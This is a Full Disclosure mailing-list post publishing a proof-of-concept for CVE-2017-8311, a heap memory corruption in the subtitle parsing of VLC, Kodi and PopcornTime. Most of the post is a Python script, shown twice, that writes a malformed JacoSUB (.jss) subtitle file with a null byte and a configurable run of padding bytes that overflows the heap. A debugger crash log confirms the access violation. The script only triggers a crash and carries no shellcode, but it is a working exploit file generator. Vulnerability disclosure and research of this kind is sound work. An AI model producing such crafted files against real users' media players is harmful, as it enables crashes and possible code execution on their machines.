'[FD] VLC Media Player/Kodi/PopcornTime 'Red Chimera' < 2.2.5 Memory Corruption (PoC)'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [FD] VLC Media Player/Kodi/PopcornTime 'Red Chimera' < 2.2.5 Memory Corruption (PoC)
From:       Kroppoloe via Fulldisclosure <fulldisclosure () seclists ! org>
Date:       2018-04-22 11:29:07
Message-ID: E0HnYDgc4jaC1mXMtRGaHN7TRhGuypizkTAhb1gJqJA6HAmr-Y-Grm7V4ECemJY--9ffgDd65LyKvdjHy_iEbv0jgEbXLZfqdNwEWM54Hiw= () protonmail ! ch
[Download RAW message or body]

[Attachment #2 (text/plain)]

> ------- Original Message -------
> On 22 April 2018 4:27 AM, Kroppoloe <kroppoloe@protonmail.ch> wrote:
> 
> > """
> > VLC Media Player/Kodi/PopcornTime 'Red Chimera' < 2.2.5 Memory Corruption (PoC)
> > Author: SivertPL (kroppoloe@protonmail.ch)
> > CVE: CVE-2017-8311
> > 
> > Infamous VLC/Kodi/PopcornTime subtitle attack in libsubtitle_plugin.dll.
> > This is the Proof of Concept of the reverse engineered heap corruption vulnerability \
> > affecting JacoSUB parsing in VLC/Kodi/PopcornTime. The crash is exploitable, but hard to \
> > exploit because of various environmental constraints such as \
> > threading/mitigations/scriptless. I want to join a research team.
> > """
> > 
> > """
> > ModLoad: 00000000`71660000 00000000`716a2000   C:\Program Files \
> >                 (x86)\VideoLAN\VLC\plugins\demux\libmp4_plugin.dll
> > ModLoad: 00000000`71630000 00000000`71651000   C:\Program Files \
> >                 (x86)\VideoLAN\VLC\plugins\demux\libavi_plugin.dll
> > ModLoad: 00000000`71610000 00000000`7162e000   C:\Program Files \
> >                 (x86)\VideoLAN\VLC\plugins\demux\libasf_plugin.dll
> > ModLoad: 00000000`71600000 00000000`7160d000   C:\Program Files \
> >                 (x86)\VideoLAN\VLC\plugins\demux\libdemux_cdg_plugin.dll
> > ModLoad: 00000000`715e0000 00000000`715fd000   C:\Program Files \
> >                 (x86)\VideoLAN\VLC\plugins\demux\libvobsub_plugin.dll
> > ModLoad: 00000000`715d0000 00000000`715de000   C:\Program Files \
> >                 (x86)\VideoLAN\VLC\plugins\demux\libdemux_stl_plugin.dll
> > ModLoad: 00000000`715b0000 00000000`715cf000   C:\Program Files \
> > (x86)\VideoLAN\VLC\plugins\demux\libsubtitle_plugin.dll core demux error: option \
> > sub-original-fps does not exist (33c.d10): Access violation - code c0000005 (first chance)
> > First chance exceptions are reported before any exception handling.
> > This exception may be expected and handled.
> > *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program \
> > Files (x86)\VideoLAN\VLC\plugins\demux\libsubtitle_plugin.dll - libsubtitle_plugin+0x44de:
> > 715b44de 881f            mov     byte ptr [edi],bl          ds:002b:1b9fb000=??
> > 0:012:x86> g
> > (33c.d10): Access violation - code c0000005 (!!! second chance !!!)
> > wow64!Wow64NotifyDebugger+0x1d:
> > 00000000`754ac9f1 654c8b1c2530000000 mov   r11,qword ptr gs:[30h] \
> > gs:00000000`00000030=???????????????? """
> > 
> > import os
> > import struct
> > import sys
> > import argparse
> > 
> > len = 1025
> > 
> > def main(argv):
> > parser = argparse.ArgumentParser()
> > parser.add_argument("filename", help="Name of the movie file w/o extension, for generating \
> > payload") parser.add_argument("--length", help="Heap overwrite length (default 1025, may be \
> > bigger)", type=int) args = parser.parse_args()
> > if args.length:
> > global len
> > len = args.length
> > print "[+] Generating file %s.jss with overwrite size of %d" % (args.filename, len)
> > write(args.filename, len)
> > 
> > def write(name, len):
> > subtitles = open("%s.jss" % name, "w+")
> > subtitles.write("0:00:02.00 0:00:04.00 VL red chimera..\n")
> > subtitles.write("0:00:04.00 0:00:05.00 vm attack")
> > subtitles.write("\\C")
> > subtitles.write(struct.pack('B', 0))
> > subtitles.write('A' * len)
> > subtitles.close()
> > print "[+] Done!"
> > 
> > if __name__ == "__main__":
> > main(sys.argv[1:])

["red_chimera.py" (text/plain)]

"""
VLC Media Player/Kodi/PopcornTime 'Red Chimera' < 2.2.5 Memory Corruption (PoC)
Author: SivertPL (kroppoloe@protonmail.ch)
CVE: CVE-2017-8311

Infamous VLC/Kodi/PopcornTime subtitle attack in libsubtitle_plugin.dll.
This is the Proof of Concept of the reverse engineered heap corruption vulnerability affecting \
JacoSUB parsing in VLC/Kodi/PopcornTime. The crash is exploitable, but hard to exploit because \
of various environmental constraints such as threading/mitigations/scriptless. I want to join a \
research team. """

"""
ModLoad: 00000000`71660000 00000000`716a2000   C:\Program Files \
                (x86)\VideoLAN\VLC\plugins\demux\libmp4_plugin.dll
ModLoad: 00000000`71630000 00000000`71651000   C:\Program Files \
                (x86)\VideoLAN\VLC\plugins\demux\libavi_plugin.dll
ModLoad: 00000000`71610000 00000000`7162e000   C:\Program Files \
                (x86)\VideoLAN\VLC\plugins\demux\libasf_plugin.dll
ModLoad: 00000000`71600000 00000000`7160d000   C:\Program Files \
                (x86)\VideoLAN\VLC\plugins\demux\libdemux_cdg_plugin.dll
ModLoad: 00000000`715e0000 00000000`715fd000   C:\Program Files \
                (x86)\VideoLAN\VLC\plugins\demux\libvobsub_plugin.dll
ModLoad: 00000000`715d0000 00000000`715de000   C:\Program Files \
                (x86)\VideoLAN\VLC\plugins\demux\libdemux_stl_plugin.dll
ModLoad: 00000000`715b0000 00000000`715cf000   C:\Program Files \
(x86)\VideoLAN\VLC\plugins\demux\libsubtitle_plugin.dll core demux error: option \
sub-original-fps does not exist (33c.d10): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files \
(x86)\VideoLAN\VLC\plugins\demux\libsubtitle_plugin.dll - libsubtitle_plugin+0x44de:
715b44de 881f            mov     byte ptr [edi],bl          ds:002b:1b9fb000=??
0:012:x86> g
(33c.d10): Access violation - code c0000005 (!!! second chance !!!)
wow64!Wow64NotifyDebugger+0x1d:
00000000`754ac9f1 654c8b1c2530000000 mov   r11,qword ptr gs:[30h] \
gs:00000000`00000030=???????????????? """

import os
import struct
import sys
import argparse

len = 1025

def main(argv):
    parser = argparse.ArgumentParser()
    parser.add_argument("filename", help="Name of the movie file w/o extension, for generating \
payload")  parser.add_argument("--length", help="Heap overwrite length (default 1025, may be \
bigger)", type=int)  args = parser.parse_args()
    if args.length:
        global len
        len = args.length
    print "[+] Generating file %s.jss with overwrite size of %d" % (args.filename, len)
    write(args.filename, len)

def write(name, len):
    subtitles = open("%s.jss" % name, "w+")
    subtitles.write("0:00:02.00 0:00:04.00 VL red chimera..\n")
    subtitles.write("0:00:04.00 0:00:05.00 vm attack")
    subtitles.write("\\C")
    subtitles.write(struct.pack('B', 0))
    subtitles.write('A' * len)
    subtitles.close()
    print "[+] Done!"

if __name__ == "__main__":
     main(sys.argv[1:])

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[prev in list] [next in list] [prev in thread] [next in thread] 